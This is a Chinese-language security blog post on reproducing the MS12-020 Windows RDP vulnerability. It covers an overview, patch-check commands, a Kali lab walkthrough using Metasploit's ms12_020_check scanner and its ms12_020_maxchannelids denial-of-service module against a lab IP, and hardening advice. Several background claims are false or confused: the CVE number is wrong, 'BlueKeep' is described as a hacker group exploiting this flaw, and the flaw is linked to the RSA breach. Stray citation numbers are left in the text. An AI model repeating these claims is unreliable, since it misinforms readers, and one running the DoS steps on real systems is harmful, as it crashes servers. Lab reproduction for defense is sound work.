MS12-020漏洞利用及复现

原创 simeon的文章 小兵搞安全 2025-06-09 05:51

1.1MS12-020简介

MS12-020 漏洞是微软在2012年发布的一个安全更新所修复的漏洞，它涉及到Windows操作系统的远程桌面协议（RDP）。该漏洞编号为CVE-2012-0003，属于远程代码执行（RCE）类型，允许未经认证的攻击者通过发送特制的RDP数据包到开启了RDP服务的目标系统上来执行任意代码。

1.1.1具体危害

1.远程代码执行（RCE）

攻击者可发送特制RDP数据包，触发内存处理错误，在目标系统上执行任意代码，获得SYSTEM级权限
，从而完全控制系统（安装程序、窃取数据、创建账户等）
367
。此危害级别最高，但实际稳定利用难度较大，需精准绕过安全机制。

2.系统崩溃与蓝屏（DoS）

更常见的危害是触发死亡蓝屏
（BSOD），导致系统崩溃重启。此攻击成功率极高，可瘫痪关键服务器或工作站。例如，Metasploit的auxiliary/dos/windows/rdp/ms12_020_maxchannelids
模块专用于此类攻击。

3.敏感数据泄露

成功利用RCE后，攻击者可访问系统内所有文件、凭证、数据库等敏感信息。历史案例显示，该漏洞曾导致美国RSA安全公司技术秘密被盗。

4.大规模传播风险

漏洞影响几乎所有主流Windows版本（XP/Vista/7/8、Server 2003/2008/2012等）。2019年黑客组织“BlueKeep”仍利用此漏洞在互联网扩散恶意软件。

危害类型	严重程度	具体影响	利用难度
远程代码执行	⚠️ 极高	系统完全沦陷，数据泄露	高
系统崩溃/蓝屏	⚠️ 高	服务中断，系统瘫痪	低
敏感数据泄露	⚠️ 高	凭证、文件、数据库等被窃取	中
蠕虫传播	⚠️ 中	内网横向渗透，大规模感染	中

1.1.2漏洞排查

systeminfo | findstr “KB2621440”

systeminfo | findstr “KB2667402”

1.2漏洞利用

1.2.1实验条件

1.被攻击目标

内网IP地址：192.168.199.131 server2008 未修补漏洞

2.攻击环境

kali环境。

1.2.2扫描目标服务器端口

1.扫描目标端口

nmap -Pn 192.168.199.131

1.2.3漏洞检测

1.msf下搜索ms12-020关键字

search ms12-020

2.使用模块进行检查

（1）use auxiliary/scanner/rdp/ms12_020_check

（2）info 查看信息

（3）配置被攻击服务器IP

set RHOSTS 192.168.199.131

（4）漏洞可利用检查

1.2.4Dos攻击

1.执行以下命令

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

set RHOSTS 192.168.199.131 

run

结果如下图所示

1.3防护措施

1.安装官方补丁

微软补丁KB2621440（
下载链接
）。
https://learn.microsoft.com/zh-cn/security-updates/SecurityBulletins/2012/ms12-020

2.加固RDP服务

启用网络级身份验证（NLA）
：要求连接前先验证用户身份

。

关闭“允许任意版本远程桌面连接”，限制可信IP访问

。

3.减少攻击面

关闭不必要的3389端口，或通过VPN访问RDP。

配置防火墙规则，禁止公网访问3389

。

4.主动监控

使用IDS/IPS检测异常RDP数据包（如大量MS_T120
信道请求）。

1.4总结

MS12-020因其影响范围广、利用工具成熟
，成为内网渗透的经典漏洞。尽管补丁已发布多年，未修复的系统（如老旧服务器、工控设备）仍面临极高风险。防御核心是关闭非必要RDP服务+强制身份验证
，同时通过补丁彻底消除隐患

。对于安全人员，该漏洞复现需在授权环境下进行，避免对生产系统造成不可逆损害。现在补丁文件也不好下载了，只能限制访问访问。